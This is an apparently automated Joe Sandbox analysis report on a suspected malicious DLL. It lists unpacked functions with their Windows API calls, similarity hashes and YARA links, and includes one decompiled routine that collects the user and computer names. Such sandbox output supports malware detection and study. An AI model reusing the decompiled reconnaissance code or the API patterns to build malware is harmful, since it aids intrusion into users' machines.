                  • Part of subcall function 046E36FE: CloseHandle.KERNEL32(00000006), ref: 046E37F1
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                • String ID:
                • API String ID: 1727939831-0
                • Opcode ID: a5eed24b694e0b02ac327753cfabab6d39cf3209c99dbcd64dd539f935850c7d
                • Instruction ID: 0b61e8a28b248d5a10c3eb8c6893f030b3af7bba5bd6a61bace2b562ee67c08a
                • Opcode Fuzzy Hash: a5eed24b694e0b02ac327753cfabab6d39cf3209c99dbcd64dd539f935850c7d
                • Instruction Fuzzy Hash: E9518C7190021ABFDB01AFA5CD889BE7BFAEF48204B04406DE915A7221FB35F9119B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E4C0C Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,?,00000010,?,00000110,?), ref: 046E4C5D
                • memcpy.NTDLL(00000000,?,?,0000011F,?,00000110,?), ref: 046E4CF0
                • GetLastError.KERNEL32(?,?,0000011F,?,00000110,?), ref: 046E4D48
                • GetLastError.KERNEL32(?,00000110,?), ref: 046E4D7A
                • GetLastError.KERNEL32(?,00000110,?), ref: 046E4D8E
                • GetLastError.KERNEL32(?,00000110,?,?,?,?,?,?,?,?,?,?,?,046C21D6,00000000,?), ref: 046E4DA3
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$memcpy
                • String ID:
                • API String ID: 2760375183-0
                • Opcode ID: 856319ca8f7c3f96733c4d962d7815832f0caa907b2533a0a068d52e7755da42
                • Instruction ID: 539552ba2d58126b6b6af28d3f09c3be819ee7a21ef7779314092e579c15dae2
                • Opcode Fuzzy Hash: 856319ca8f7c3f96733c4d962d7815832f0caa907b2533a0a068d52e7755da42
                • Instruction Fuzzy Hash: E8515FB1901209FFDB10DFA6D884AEEBBF9EB44750F008426F901E7240F775AE109B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D24CF Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpy.KERNEL32(?,00000020), ref: 046D25CC
                • lstrcat.KERNEL32(?,00000020), ref: 046D25E1
                • lstrcmp.KERNEL32(00000000,?), ref: 046D25F8
                • lstrlen.KERNEL32(?,?,D448B889,00000000,69B25F44), ref: 046D261C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: d69ae8b3fcbd3fa0a524a26ae85bb03db11c23e9f08178a38c8009a6812ebd1e
                • Instruction ID: b5de0347b71eb952c861e8cbdce1729adb64a8e013d2fff91f05bcb5503f5b0d
                • Opcode Fuzzy Hash: d69ae8b3fcbd3fa0a524a26ae85bb03db11c23e9f08178a38c8009a6812ebd1e
                • Instruction Fuzzy Hash: 2951B371E00208EFDF21CF99C8A4AADBBB5FF65315F04809AE8559B311E770BA52DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D665E Relevance: 7.6, APIs: 5, Instructions: 133registrysynchronizationthreadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD43D
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD490
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?), ref: 046DD498
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD4BB
                  • Part of subcall function 046DD39D: wcscpy.NTDLL ref: 046DD4CD
                • WaitForSingleObject.KERNEL32(00000000,?,04C99998,?,00000000,00000000,00000001), ref: 046D6708
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046D6742
                • RegCloseKey.ADVAPI32(?), ref: 046D676E
                • WaitForSingleObject.KERNEL32(00000000,Function_0000E2C5,046EE374), ref: 046D67D2
                • RtlExitUserThread.NTDLL(?), ref: 046D6808
                  • Part of subcall function 046D680F: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,046DDB2C,00000000,?,?), ref: 046D682D
                  • Part of subcall function 046D680F: GetFileSize.KERNEL32(00000000,00000000,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?), ref: 046D683D
                  • Part of subcall function 046D680F: CloseHandle.KERNEL32(000000FF,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?,00000000), ref: 046D689F
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                  • Part of subcall function 046E36FE: GetLastError.KERNEL32 ref: 046E3749
                  • Part of subcall function 046E36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                  • Part of subcall function 046E36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                  • Part of subcall function 046E36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                  • Part of subcall function 046E36FE: SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
                  • Part of subcall function 046E36FE: CloseHandle.KERNEL32(00000006), ref: 046E37F1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
                • String ID:
                • API String ID: 796380773-0
                • Opcode ID: 2f5ed950f3958694cdccdaf2e18aabcc7a3438253b09a1c55835957e41ffdbf5
                • Instruction ID: 17e7ae8a371c5cfc7dac07b35a3ba9287134240203c83ebc5a7d935c46911312
                • Opcode Fuzzy Hash: 2f5ed950f3958694cdccdaf2e18aabcc7a3438253b09a1c55835957e41ffdbf5
                • Instruction Fuzzy Hash: A1517F71E0120AAFEB04DFA6DD89FAA77F8EB04304F004069E604EB251F775AE45CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E3232 Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E3254
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E3265
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E3277
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E3289
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E329B
                • lstrlenW.KERNEL32(?,046E72E8,04C99A03,00000057), ref: 046E32A7
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen
                • String ID:
                • API String ID: 1659193697-0
                • Opcode ID: 091c9e000ed3dafbfc644b91f6a721b099bac027514b940dc7fe08235786fb30
                • Instruction ID: a7bc341f4c434ec194851301c6899e2b044a6f7ac3b9f43d710e3235c8647591
                • Opcode Fuzzy Hash: 091c9e000ed3dafbfc644b91f6a721b099bac027514b940dc7fe08235786fb30
                • Instruction Fuzzy Hash: FB412B71E01209AFCB20DFAAC884A7EB7FABF94204B14886DD955E7311F774E9858B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DE555 Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CC9D1: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 046CC9DD
                  • Part of subcall function 046CC9D1: SetLastError.KERNEL32(000000B7,?,046DE569,?,?,00000000,?,?,?), ref: 046CC9EE
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 046DE589
                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 046DE661
                  • Part of subcall function 046D5FA2: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 046D5FBC
                  • Part of subcall function 046D5FA2: CreateWaitableTimerA.KERNEL32(046EE268,00000003,?), ref: 046D5FD9
                  • Part of subcall function 046D5FA2: GetLastError.KERNEL32(?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046D5FEA
                  • Part of subcall function 046D5FA2: GetSystemTimeAsFileTime.KERNEL32(?,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D602A
                  • Part of subcall function 046D5FA2: SetWaitableTimer.KERNEL32(00000000,046DE5BD,00000000,00000000,00000000,00000000,?,?,046DE5BD,?), ref: 046D6049
                  • Part of subcall function 046D5FA2: HeapFree.KERNEL32(00000000,046DE5BD,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D605F
                • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 046DE64A
                • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 046DE653
                  • Part of subcall function 046CC9D1: CreateMutexA.KERNEL32(046EE268,00000000,?,?,046DE569,?,?,00000000,?,?,?), ref: 046CCA01
                • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 046DE66E
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                • String ID:
                • API String ID: 1700416623-0
                • Opcode ID: 5948a0eb0204042c74a8bdff8927a10dba7ba6ef03892351c53882ad38bef662
                • Instruction ID: 46501fde5552d132100544e8d40a6f2360ec53f82b33a6146571ece55b0267a4
                • Opcode Fuzzy Hash: 5948a0eb0204042c74a8bdff8927a10dba7ba6ef03892351c53882ad38bef662
                • Instruction Fuzzy Hash: AB316E75B00204ABDB11AF66DC949AEBBF9FF99315B14442AE802DF350F636AC41CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DA5E1 Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                Download Yara Rule
                APIs
                • RtlImageNtHeader.NTDLL(00000000), ref: 046DA5FA
                  • Part of subcall function 046CE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,046DBCFE), ref: 046CE9D6
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,046C7B94,00000000), ref: 046DA63C
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 046DA68E
                • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,046C7B94,00000000), ref: 046DA6A7
                  • Part of subcall function 046D83BC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 046D83DD
                  • Part of subcall function 046D83BC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,046DA62D,00000000,00000000,00000000,00000001,?,00000000), ref: 046D8420
                • GetLastError.KERNEL32(?,00000000,046C7B94,00000000,?,?,?,?,?,?,?,046C8D64,?), ref: 046DA6DF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                • String ID:
                • API String ID: 1921436656-0
                • Opcode ID: 00f0efa0f4e5227dddf86afb4362598e1308c03758c1fb4ad85325a8b63f92c5
                • Instruction ID: ca77dc20cfddf7fbaa5450a88e28127441ce36bd12f1575a2996e1b1ac6a65e2
                • Opcode Fuzzy Hash: 00f0efa0f4e5227dddf86afb4362598e1308c03758c1fb4ad85325a8b63f92c5
                • Instruction Fuzzy Hash: 14312C75E04249EFDF11EFA5DD40AAE7BB9EB04750F004069E905AB240F775AE40DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E577A Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 046E57FC
                • lstrcpy.KERNEL32(00000000,?), ref: 046E5815
                • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 046E5822
                • lstrlen.KERNEL32(046EF3A8,?,?,?,?,?,00000000,00000000,?), ref: 046E5834
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 046E5865
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                • String ID:
                • API String ID: 2734445380-0
                • Opcode ID: d2760bdf6896bb57e57e5c215f7be6f9b6ff05b925684378ace9790283ccd45b
                • Instruction ID: b28998e0336ea18980bacfc275b2e2155847068376ab3eccdb26659dd412b35d
                • Opcode Fuzzy Hash: d2760bdf6896bb57e57e5c215f7be6f9b6ff05b925684378ace9790283ccd45b
                • Instruction Fuzzy Hash: 24315772900219FFDB11DFA6CC88EAB7BF8EB44314F044428F91996240F775AA16DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D35E9 Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D20E3: RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D20EB
                  • Part of subcall function 046D20E3: RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D2100
                  • Part of subcall function 046D20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 046D2119
                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 046D3620
                • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,046DC9D5,?,00000000), ref: 046D3631
                • lstrcmpi.KERNEL32(00000002,?), ref: 046D3677
                • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,046DC9D5,?,00000000), ref: 046D368B
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,046DC9D5,?,00000000), ref: 046D36D1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                • String ID:
                • API String ID: 733514052-0
                • Opcode ID: 7df9ac8de50bd45b1f5c471a026f905959bd649ed784745bf4ffc9e7822b8113
                • Instruction ID: 413c5ca08910a8c8ef6c462098f4202ed6f703376f192069f4370b6a5bb8080e
                • Opcode Fuzzy Hash: 7df9ac8de50bd45b1f5c471a026f905959bd649ed784745bf4ffc9e7822b8113
                • Instruction Fuzzy Hash: 8431A272E00259BFDB10DFA5DC98A9E7BF8FB04614F140068E905A7300F776AD84CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CD146 Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046DBDF1: lstrlen.KERNEL32(?,00000001,?,00000008,046DD288,?,00000000,00000001,00000000,04C9C088,04C9C088,00000000,046C832B,00000000,?,?), ref: 046DBDFD
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046CD170
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046CD183
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 046CD194
                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 046CD1FF
                • InterlockedIncrement.KERNEL32(046EE4BC), ref: 046CD216
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                • String ID:
                • API String ID: 3915436794-0
                • Opcode ID: 8fc2df8797cbebae887089fe659db6a0bcb36b2992bfb2414e39a8016c06ab8b
                • Instruction ID: 2082d049f1acb3286e575ce12ad3fd6953da87ea07e450bf0491b859663247d9
                • Opcode Fuzzy Hash: 8fc2df8797cbebae887089fe659db6a0bcb36b2992bfb2414e39a8016c06ab8b
                • Instruction Fuzzy Hash: 04317831A05706DFE721EF59D84493AB7F8FB94325B00492EF99987240F739E819CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C13C13 Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C13C13() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E01C12114(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E01C12C11(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                0x01c13c21
                0x01c13c24
                0x01c13c27
                0x01c13c2d
                0x01c13c32
                0x01c13c38
                0x01c13c40
                0x01c13c43
                0x01c13c49
                0x01c13c4e
                0x01c13c5b
                0x01c13c68
                0x01c13c6c
                0x01c13c6e
                0x01c13c72
                0x01c13c75
                0x01c13c85
                0x01c13cd7
                0x01c13cd8
                0x01c13c87
                0x01c13c8a
                0x01c13c91
                0x01c13c94
                0x01c13ca7
                0x00000000
                0x01c13ca9
                0x01c13cac
                0x01c13cbf
                0x01c13cc2
                0x01c13cca
                0x01c13ccd
                0x00000000
                0x01c13ccf
                0x01c13ccf
                0x01c13cd2
                0x01c13cd2
                0x01c13ccd
                0x01c13ca7
                0x01c13cdd
                0x01c13cde
                0x01c13c4e
                0x01c13ce4

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 01C13C27
                • GetComputerNameW.KERNEL32(00000000,?), ref: 01C13C43
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetUserNameW.ADVAPI32(00000000,?), ref: 01C13C7D
                • GetComputerNameW.KERNEL32(?,?), ref: 01C13C9F
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 01C13CC2
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                • String ID:
                • API String ID: 3850880919-0
                • Opcode ID: 680e49b5a73222e2df22bbda4245c7a82f1c73e5f5ffdc58a9872518f4c86e22
                • Instruction ID: acec2b4c1a0487dbb2f2fc88114b0d5634f5a60d9adc1ac47d6ba665f21ee8cd
                • Opcode Fuzzy Hash: 680e49b5a73222e2df22bbda4245c7a82f1c73e5f5ffdc58a9872518f4c86e22
                • Instruction Fuzzy Hash: 3021F975A40159FFDB11DFA9C994CEEBBBCFE45208B50416AE602E7204D630DB04EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C5D47 Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                • DeleteFileA.KERNEL32(00000000,000004D2), ref: 046C5D6A
                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 046C5D73
                • GetLastError.KERNEL32 ref: 046C5D7D
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C5E3C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 3543646443-0
                • Opcode ID: efc53d495cb259beae6e176344398632af28a71f26c7c43df45f0f5824c4188a
                • Instruction ID: 583b72ac871f2899db96e1a38b9c5b6f188f2427ca6a8f99a8aaf7ffe9d4097e
                • Opcode Fuzzy Hash: efc53d495cb259beae6e176344398632af28a71f26c7c43df45f0f5824c4188a
                • Instruction Fuzzy Hash: 15214FB2611511AFD310BBA5EC4CE9633DDDF8A314B00105AFA05DB252FA39F904CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D9F14 Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046DECAB: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,046DE92B,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046DECB7
                  • Part of subcall function 046DECAB: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 046DECCD
                  • Part of subcall function 046DECAB: _snwprintf.NTDLL ref: 046DECF2
                  • Part of subcall function 046DECAB: CreateFileMappingW.KERNEL32(000000FF,046EE268,00000004,00000000,00001000,?), ref: 046DED0E
                  • Part of subcall function 046DECAB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 046DED20
                  • Part of subcall function 046DECAB: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 046DED58
                • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,046DE92B,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046D9F4F
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D9F58
                • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,046DE92B,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046D9F9F
                • GetLastError.KERNEL32(046D665E,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D9FCE
                • CloseHandle.KERNEL32(00000000,046D665E,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?), ref: 046D9FDE
                  • Part of subcall function 046E2531: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,046E523E,?), ref: 046E253D
                  • Part of subcall function 046E2531: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,046E523E,?), ref: 046E2565
                  • Part of subcall function 046E2531: memset.NTDLL ref: 046E2577
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                • String ID:
                • API String ID: 1106445334-0
                • Opcode ID: 64f76e34161ef3bffff590894d0525934fee01a3489a653cb48f39564f9ad45e
                • Instruction ID: ab949236ea2ad633a5e9158f50c1ad5e04fa5d7d7627d8adc5b26f963059b94b
                • Opcode Fuzzy Hash: 64f76e34161ef3bffff590894d0525934fee01a3489a653cb48f39564f9ad45e
                • Instruction Fuzzy Hash: AB2190B1A04304AFEB24EFB6DD05A6A77E8EF04354B051429E90AE7250F736FD05CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D680F Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,046DDB2C,00000000,?,?), ref: 046D682D
                • GetFileSize.KERNEL32(00000000,00000000,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?), ref: 046D683D
                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692), ref: 046D6869
                • GetLastError.KERNEL32(?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046D688E
                • CloseHandle.KERNEL32(000000FF,?,?,046DDB2C,00000000,?,?,?,?,00000000,046CC692,?,?,?,?,00000000), ref: 046D689F
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CloseCreateErrorHandleLastReadSize
                • String ID:
                • API String ID: 3577853679-0
                • Opcode ID: 29607df15ca18c449332fbbffd0f698adbbbd10d72e162874ea8f8d5a95fa820
                • Instruction ID: 5d4ad07548b5463d17480136b8385f85200930fb310e0b0054876fd6b3dfc5fa
                • Opcode Fuzzy Hash: 29607df15ca18c449332fbbffd0f698adbbbd10d72e162874ea8f8d5a95fa820
                • Instruction Fuzzy Hash: 4911DA72900219BFEB206F65DC88EAE7B9DEB54354F014539F9159B290F670BD418770
